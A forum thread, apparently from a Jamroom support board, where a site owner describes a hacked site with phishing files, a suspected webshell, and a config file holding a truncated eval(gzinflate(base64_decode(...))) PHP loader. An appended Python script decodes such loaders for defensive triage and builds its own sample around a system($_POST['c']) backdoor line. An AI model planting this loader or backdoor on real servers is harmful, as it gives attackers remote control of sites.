I downloaded a fresh back-up yesterday. The first issue I saw was that it won't fully unzip. It says there is an unexpected ending.
However, I unzipped it as best I could and ran Avast anti-virus on the complete back-up. Avast didn't like 3 files.
1) In public_html config there was one called Works. I'm not sure if it's a false positive; can you confirm?
It is full of stuff like this - <? eval(gzinflate(base64_decode('7X1rcxs5kuBnd0T/B7ia3STHfMpv0ZQt62G7bUtqS7bbLSkYRVaRKqvIoquKomS378fdP7iIi7ivHRM3sb1zOzM7s3EXd3EXsZeZeBTqRVKy7JnZXblbIgFkIpEAEolEIuGMnE5gh6Wi5QRj1zzr2L7v+UGxwprl1tdfOcnsIDT9cDJOFKNvHd8ee37ojAal
2) There were 2 upload folders with what appear to be English Paypal Phishing files (last time was German). Those have been deleted and the hosting company notified.
Question: Since we don't have any artists currently using Upload folders for FTP'ing files up, can those be disabled? This would just leave individual file uploads, and the multiple file uploader, as options for now.
I'm thinking that may be how they are getting in, although there seems to be no way to know for sure. At least it's one potential doorway to close, if there is a means.
What is your host doing about this? Are they aware of what is going on?
Yes, they are aware. I had to get them to delete one of the hacker folders because in Apache mode it can't be done from my end, ownership has to be assigned first.
He said his programmer will look into it, but he doubts anything actionable will be found. The mail system is choked to 5 a day to prevent spamming of this stuff, which happened the first time with German phishing files.
The first time around files were found that appeared to be symlinked to the root according to Brian. No evidence of that this time so far.
I'm downloading another back-up so I can run a scan on it to make sure I'm clean. Passwords are changed again. Looking for suggestions.
I accidentally deleted the file when my anti-virus ran, so I will have to check back-ups to see if it existed in older versions. It was called Works and was found in public_html config folder. Does anyone know if Jamroom normally has a file by that name in that location and why Avast would see it as malware?
Also, the head programmer at the host company who has tons of experience, who used to run their own datacenter, and who is a security expert, said there has been an outbreak of this type of attack (publishing, e-mail) in the last 3 months. It's an unprecedented phenomenon of sorts which seems to be perpetrated by a new breed of automatic software.
Many well-known and respectable companies have had to rewrite their scripts to close holes, so it might be something for Jamroom to consider. I am told that neither the server root nor cPanel was compromised; it is the script itself which has the holes, as is turning out to be the case almost everywhere with this new type of attack.
My site was detected because we had an unlimited e-mail account which they spammed with, but there could potentially be many Jamroom sites infected who are thus far oblivious, because their mail is set to under 200 a day.
This is all speculation at this point, but speculation by an expert in this field who really knows their stuff. I just throw it out there to be helpful, in case this is useful information the staff should take note of.
I found it in an old back-up and ran it at the site you linked. It came back as an error, not a valid string. Is it a Jamroom file which I need to put back, or a hacker file I need to remove? Avast says it's malware but I don't know if it's a false positive.
I can send you the file if you wish, but as the script authors, I thought you would be able to tell me just from the name.
Do not delete those files or your Jamroom will not work. They are not PHP files so are not open to being "hacked".
Hope this helps!
- Brian
Hi Brian,
1) That is the case, the two extras have different file numbers but inside they are identical. What scares me is they have an additional line of code not in the original .htpasswd - is that normal?
2) Also, I want to send a file I found to you for analysis. It is a version of the Webshell by Boff. I think they have adapted it for Jamroom, so that they can leave that there as a back door to give them undetectable control of a Jamroom site.
Are you interested in seeing the file, and if so how can I get it to you? You have no PM, no way to attach a file, and when I tried to send it to my host for inspection, the e-mail bounced it. I'm afraid to upload it anywhere and send a link, because I'm not entirely sure what it does.
3) Above I also asked about a file called Works that was found in public_html config. Avast says it's malware so I deleted it. Is it malware, or should I put it back?
It is full of stuff like this - <? eval(gzinflate(base64_decode('7X1rcxs5kuBnd0T/B7ia3STHfMpv0ZQt62G7bUtqS7bbLSkYRVaRKqvIoquKomS378fdP7iIi7ivHRM3sb1zOzM7s3EXd3EXsZeZeBTqRVKy7JnZXblbIgFkIpEAEolEIuGMnE5gh6Wi5QRj1zzr2L7v+UGxwprl1tdfOcnsIDT9cDJOFKNvHd8ee37ojAal
4) I can't seem to make a viable back-up anymore. The 7 Zip program says the file is broken with an unexpected ending. Have you seen that before?
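The `eval(gzinflate(base64_decode('...')))` line quoted twice in this thread (in the first post and again in the last) is the classic one-line loader for an obfuscated PHP webshell: the real code is raw-DEFLATE compressed, base64 encoded, and only appears when it is decoded and executed. The string pasted in the thread is truncated, so it cannot be decoded here, but the right way to answer "is it malware or a Jamroom file?" is to decode the payload statically (never run it) and read what is inside. The following is an added example, not code from the thread, from Jamroom or from Avast; it constructs its own two-layer sample in memory (the innermost payload, the `Works` path and the `upload/x.php` path are all constructed for the demonstration), peels the layers with Python's `zlib` using `wbits=-15` because PHP's `gzinflate()` is raw DEFLATE, and flags a truncated or corrupted payload instead of crashing on it.

```python
"""Static triage of eval(gzinflate(base64_decode(...))) loaders.

Added example: decodes obfuscated PHP loaders without executing them.
All sample file contents below are constructed for the demonstration.
"""
import base64
import re
import zlib

# Loader prefix: enough to flag a file even when the payload is cut off.
LOADER_PREFIX = re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I)

# Full loader with its base64 argument, used to extract the payload.
OBFUSCATED_EVAL = re.compile(
    r"""eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)\s*\)\s*\)""",
    re.I,
)


def gzinflate_b64(payload: str) -> str:
    """Reverse base64_decode() + gzinflate().

    PHP's gzinflate() is raw DEFLATE with no zlib/gzip header, hence wbits=-15.
    Raises ValueError (bad base64) or zlib.error (truncated/corrupt stream).
    """
    raw = base64.b64decode(payload, validate=True)
    return zlib.decompress(raw, -15).decode("latin-1")


def peel_layers(source: str, max_layers: int = 10) -> list:
    """Decode nested loaders and return the plaintext of each layer, outermost first.

    Obfuscated shells commonly nest several loaders; we keep decoding while the
    result is itself a loader. Nothing is ever eval'd.
    """
    layers = []
    current = source
    for _ in range(max_layers):
        m = OBFUSCATED_EVAL.search(current)
        if not m:
            break
        try:
            current = gzinflate_b64(m.group(1))
        except (ValueError, zlib.error) as exc:
            # Truncated base64 or an incomplete DEFLATE stream (as with the
            # cut-off string quoted in the thread): report, don't crash.
            layers.append(f"<undecodable payload: {exc}>")
            break
        layers.append(current)
    return layers


def triage(files: dict) -> dict:
    """Scan {path: content}; return {path: decoded layers} for files carrying the loader."""
    return {path: peel_layers(text) for path, text in files.items() if LOADER_PREFIX.search(text)}


# --- constructed sample data (the way an obfuscator would build it) ---------
def deflate_b64(php: str) -> str:
    """base64(raw DEFLATE(php)), i.e. what base64_decode()+gzinflate() undoes."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(php.encode("latin-1")) + comp.flush()).decode()


def build_loader(php: str) -> str:
    """Wrap PHP code in one eval(gzinflate(base64_decode())) layer."""
    return "eval(gzinflate(base64_decode('" + deflate_b64(php) + "')));"


# Constructed innermost payload: a minimal command-execution backdoor body.
INNER_PHP = "if (isset($_POST['c'])) { system($_POST['c']); }"

SAMPLE_FILES = {
    # two nested loader layers, as a dropped shell typically looks
    "public_html/config/Works": "<? " + build_loader(build_loader(INNER_PHP)) + " ?>",
    # a benign config file that must not be flagged
    "public_html/config/config.php": "<?php $CONFIG['site'] = 'example'; ?>",
    # a loader whose base64 was truncated (8 chars kept), like a cut-off paste
    "public_html/upload/x.php": "<? eval(gzinflate(base64_decode('" + deflate_b64(INNER_PHP)[:8] + "'))); ?>",
}

if __name__ == "__main__":
    for path, layers in triage(SAMPLE_FILES).items():
        print(path)
        for depth, text in enumerate(layers, 1):
            print(f"  layer {depth}: {text[:70]}")
```

Run this over an unpacked backup by replacing `SAMPLE_FILES` with a walk of the tree (read files as `latin-1` so binary junk does not raise). A file that decodes to `system($_POST[...])`, `passthru`, `shell_exec`, or an FTP/mail loop is a dropped shell, whatever its name; a real application file will not be wrapped in an `eval` loader at all. When the base64 is cut off, as in the thread, the decoder reports the payload as undecodable, and the loader prefix alone is still enough to flag the file for removal and to go looking for its siblings in the upload directories.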